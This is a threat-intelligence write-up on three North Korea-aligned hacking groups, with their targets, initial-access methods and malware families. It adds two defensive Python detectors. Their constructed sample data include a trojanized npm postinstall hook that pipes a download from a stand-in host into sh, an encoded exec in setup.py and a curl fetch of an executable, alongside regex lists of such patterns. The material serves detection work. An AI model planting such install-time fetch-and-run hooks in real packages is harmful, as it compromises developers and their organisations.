Labyrinth Chollima Splits Into Three Cyber Adversaries
Recent threat intelligence analysis shows that what was once treated as a single North Korea-aligned activity cluster has matured into three clearly differentiated adversary groups. These groups operate under the Chollima umbrella but pursue distinct objectives, targets, and technical tradecraft. The evolution highlights how state-aligned cyber operations scale by specialization rather than centralization.
Source: CrowdStrike blog
The three groups are now tracked as Golden Chollima, Labyrinth Chollima, and Pressure Chollima.
Golden Chollima: Financially Motivated Operations
Mission and Targeting
Golden Chollima focuses primarily on cryptocurrency theft. Its targeting centers on small to mid-sized fintech firms and cryptocurrency service providers across the United States, Canada, South Korea, India, and Western Europe.
Tradecraft and Initial Access
The group relies heavily on malicious applications disguised as cryptocurrency trading tools. These lures are often combined with supply chain compromise and HR-themed social engineering to gain execution on developer or finance systems. Golden Chollima has also exploited Chromium zero-day vulnerabilities and has conducted cloud-conscious intrusions, pivoting into victims' cloud environments once a foothold is obtained.
Malware Ecosystem
Golden Chollima’s tooling emphasizes theft and persistence, with malware families such as Jeus, AppleJeus, SnakeBaker, NodaliBaker, and HTTPHelper. These tools are optimized for credential harvesting, wallet access, and lateral movement in financial environments.
Labyrinth Chollima: Strategic Intelligence Collection
Source: LABYRINTH CHOLLIMA successors
Mission and Targeting
Labyrinth Chollima is the most espionage-focused of the three groups. Its operations target the defense, maritime, nuclear, logistics, military, and government sectors, primarily in the United States, Europe, and South Korea.
Initial Access and Exploitation
This group uses fake PDF readers, trojanized open source projects, and HR-themed social engineering to deliver malware. Labyrinth Chollima also deploys TightVNC for interactive hands-on-keyboard access and has used zero-day vulnerabilities to establish initial footholds.
Advanced Tooling
Its malware stack is broader and more stealth-focused than those of the other two groups. Known tools include Hoplight, HTTPHoplight, OpenSSLDownloader, UnderGroundRAT, HiberRAT, NedDownloader, and FudModule. These implants support long-term persistence, encrypted command and control, and modular tasking.
Pressure Chollima: High Value Financial Targeting
Mission and Targeting
Pressure Chollima also focuses on cryptocurrency theft but prioritizes large centralized exchanges and technology firms. Its operations span the United States, Europe, India, and East Asia, suggesting a more aggressive revenue-generation mandate.
Infection Chains
This group commonly abuses malicious cryptocurrency-themed applications, trojanized Node.js and Python projects, and supply chain compromise. Because a trojanized package executes during a routine install or build, this approach lets Pressure Chollima reach high value targets through the developer ecosystems those targets already trust.
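Trojanized Node.js and Python projects typically run their payload at install time rather than at runtime: an npm lifecycle script (preinstall/postinstall) or code in setup.py fetches and executes a second stage. The following scanner, an added example that is not CrowdStrike tooling or code from the report, flags such install-time hooks in package.json and setup.py text. The pattern lists are assumed heuristics, and the sample manifests are constructed for illustration.

```python
"""Flag install-time hooks in npm and Python packages that fetch or execute code.

Added example (not CrowdStrike's tooling). The regex lists below are assumed
heuristics; tune them to your environment before using them in CI.
"""
import json
import re

# npm scripts that run automatically on `npm install`
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that suggest download-and-execute at install time (assumed heuristics)
NPM_RISKY_PATTERNS = [
    r"\bcurl\b.*\|\s*(sh|bash)\b",   # curl ... | sh
    r"\bwget\b",
    r"\bnode\s+-e\b",                 # inline JavaScript
    r"\bpython3?\s+-c\b",             # inline Python
    r"\bpowershell\b",
    r"\bbase64\b",
    r"https?://",                     # any remote fetch in a lifecycle hook
]

# setup.py constructs that execute or fetch during `pip install` (assumed heuristics)
SETUP_RISKY_PATTERNS = [
    r"\bexec\s*\(", r"\beval\s*\(", r"\bsubprocess\b", r"\bos\.system\b",
    r"\burllib\b", r"\brequests\.get\b", r"\bbase64\.b64decode\b",
]


def scan_package_json(text):
    """Return [(hook, command, matched_pattern)] for risky npm lifecycle scripts."""
    findings = []
    scripts = json.loads(text).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pat in NPM_RISKY_PATTERNS:
            if re.search(pat, cmd, re.IGNORECASE):
                findings.append((hook, cmd, pat))
                break  # one finding per hook is enough
    return findings


def scan_setup_py(text):
    """Return [(line_no, line, matched_pattern)] for setup.py lines that run code at install."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # skip comments
        for pat in SETUP_RISKY_PATTERNS:
            if re.search(pat, stripped):
                findings.append((n, stripped, pat))
                break
    return findings


# Constructed sample manifests (not real packages)
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "wallet-ui", "version": "1.0.0",
    "scripts": {"test": "jest", "build": "tsc", "prepare": "husky install"},
})

TROJANIZED_PACKAGE_JSON = json.dumps({
    "name": "trading-sdk", "version": "2.3.1",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/s.sh | sh')\"",
    },
})

TROJANIZED_SETUP_PY = """\
from setuptools import setup
import base64
# payload hidden in an install-time hook
exec(base64.b64decode('cHJpbnQoJ3gnKQ=='))
setup(name='pricefeed', version='0.1')
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_PACKAGE_JSON), ("trojanized", TROJANIZED_PACKAGE_JSON)):
        for hook, cmd, pat in scan_package_json(text):
            print(f"[package.json:{name}] {hook}: {cmd!r} (matched {pat})")
    for n, line, pat in scan_setup_py(TROJANIZED_SETUP_PY):
        print(f"[setup.py] line {n}: {line} (matched {pat})")
```

Run this as a pre-merge check on dependency updates; the useful signal is a lifecycle hook or setup.py line that reaches out to the network or decodes and executes embedded data, which a legitimate library rarely needs to do during installation.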
Malware Arsenal
Pressure Chollima employs a diverse malware portfolio, including MataNet, SparkDownloader, TwoPence Electric, MagicCookie, StatusSymbol, Scuzzyfuss, IndexSymbol, GhostShip, and AlertConf. These tools enable payload staging, command execution, and data exfiltration at scale.
Comparative Technical Breakdown
| Group Name | Primary Objective | Key Targets | Core Techniques | Notable Malware |
|---|---|---|---|---|
| Golden Chollima | Cryptocurrency theft | Small fintech, crypto traders | Fake apps, supply chain abuse | Jeus, AppleJeus, SnakeBaker |
| Labyrinth Chollima | Intelligence collection | Defense, government, military | Spear phishing, zero days | Hoplight, HiberRAT, FudModule |
| Pressure Chollima | Large scale crypto theft | Exchanges, tech firms | Trojanized dev tools | MataNet, SparkDownloader |
Defensive Implications
The emergence of three specialized Chollima groups increases detection complexity. While infrastructure and tooling differ, shared themes such as developer ecosystem abuse and social engineering remain consistent across all three. Defenders should prioritize behavioral detection (for example, developer tooling spawning downloaders or remote-access utilities), software supply chain monitoring of dependency updates, and continuous threat hunting.
This evolution shows how modern state-aligned adversaries scale operations by dividing missions, tooling, and targets rather than relying on a single monolithic threat actor.
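One behavioral detection that covers the shared developer-ecosystem theme, regardless of which group's implant follows, is to look for developer tooling (node, npm, python, pip) spawning a download utility. The following is an added example, not code from the CrowdStrike report; the process-creation events are constructed and the field names (pid, ppid, image, cmdline) are assumed.

```python
"""Detect developer tooling spawning a downloader (added example, constructed events).

Assumed event schema: dicts with pid, ppid, image (full path) and cmdline.
Process lists for parents and children are assumptions; extend for your estate.
"""

# Interpreters and package managers that a trojanized project would be executed by
DEV_TOOL_PARENTS = {"node", "node.exe", "npm", "npm.cmd", "python", "python.exe",
                    "python3", "pip", "pip3"}

# Utilities that fetch a second stage
DOWNLOADER_CHILDREN = {"curl", "curl.exe", "wget", "powershell.exe", "pwsh",
                       "certutil.exe", "bitsadmin.exe"}


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_dev_tool_spawning_downloader(events):
    """Return one alert dict per downloader whose direct parent is a dev tool."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        child = _basename(e["image"])
        if child not in DOWNLOADER_CHILDREN:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # parent not in the window; cannot judge lineage
        if _basename(parent["image"]) in DEV_TOOL_PARENTS:
            alerts.append({
                "pid": e["pid"],
                "parent": _basename(parent["image"]),
                "parent_cmdline": parent["cmdline"],
                "child": child,
                "cmdline": e["cmdline"],
            })
    return alerts


# Constructed process-creation events (not real telemetry)
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # developer runs `npm install`; the package's postinstall script runs under node
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "node postinstall.js"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -s https://example.invalid/u -o %TEMP%\u.exe"},
    # same developer fetching a tarball by hand from a shell: parent is cmd, not a dev tool
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -O https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
]

if __name__ == "__main__":
    for a in detect_dev_tool_spawning_downloader(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} {a['parent']} -> {a['child']}: {a['cmdline']}")
```

The lineage check, rather than a match on curl alone, is what keeps the rule usable: developers run download tools constantly from a shell, but an interpreter launched by a package manager spawning one is rare enough to triage.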